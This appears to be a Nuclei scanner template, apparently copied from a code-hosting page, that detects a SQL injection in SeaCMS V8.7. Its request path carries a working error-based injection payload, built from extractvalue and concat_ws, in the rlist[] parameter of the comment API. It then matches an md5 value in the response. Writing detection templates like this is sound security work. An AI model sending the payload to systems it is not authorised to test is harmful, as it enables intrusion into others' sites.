31 lines
610 B
YAML
31 lines
610 B
YAML
id: seacms-sqli
|
|
|
|
info:
|
|
name: SeaCMS V8.7 SQL Injection
|
|
author: ritikchaddha
|
|
severity: high
|
|
reference:
|
|
- https://www.uedbox.com/post/54561/
|
|
tags: seacms,sqli
|
|
|
|
variables:
|
|
num: "999999999"
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5({{num}})))),@`%27`"
|
|
|
|
redirects: true
|
|
max-redirects: 2
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '{{md5({{num}})}}'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|